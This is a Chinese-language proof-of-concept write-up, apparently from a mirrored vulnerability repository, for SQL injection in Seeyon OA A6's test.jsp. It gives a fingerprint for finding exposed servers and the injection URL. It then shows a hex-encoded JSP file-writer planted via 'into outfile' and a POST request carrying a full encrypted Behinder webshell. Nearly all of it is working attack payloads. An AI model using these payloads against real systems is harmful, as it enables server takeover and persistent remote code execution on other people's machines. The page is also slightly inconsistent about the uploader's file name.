admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/致远OA A6 test.jsp SQL注入漏洞.md
Threekiii b7e3b03ac7 更新漏洞库:OA产品漏洞/
2022-05-20 15:57:09 +08:00

62 lines
3.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 致远OA A6 test.jsp SQL注入漏洞
## 漏洞描述
致远OA A6 test.jsp 存在sql注入漏洞并可以通过注入写入webshell文件控制服务器
## 漏洞影响
```
致远OA A6
```
## 网络测绘
```
title="致远A8+协同管理软件.A6"
```
## 漏洞复现
访问URL
```
http://xxx.xxx.xxx.xxx/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20database())
```
![image-20220520153021139](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201530175.png)
返回了当前使用的数据库, 要想写入shell需要知道写入的路径
![image-20220520153030730](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201530762.png)
这里得到路径 `D:\Program Files\UFseeyon\OA\mysql\bin..\`
通过 into outfile 写入文件,这里因为 jsp木马存在特殊符号使用 hex编码 上传允许文件上传的jsp文件
```
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
HEX编码
3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C5C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E
/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27)%20%20into%20outfile%20%27E:/Program Files/UFseeyon/OA/tomcat/webapps/yyoa/test_upload.jsp%27
```
![image-20220520153102550](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201531630.png)
显示上图则上传成功,访问 test_upload.jsp 为空白不报错页面不存在就是上传成功
在发送请求包上传webshell这里上传冰蝎
![image-20220520153118107](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201531199.png)
```
POST /yyoa/peiqi_upload.jsp?f=testwebshell.jsp
t=%3C%25%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%3E%3C%25!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%3E%3C%25if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%3E
```
连接木马
![image-20220520153147280](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201531378.png)
Reference in New Issue View Git Blame Copy Permalink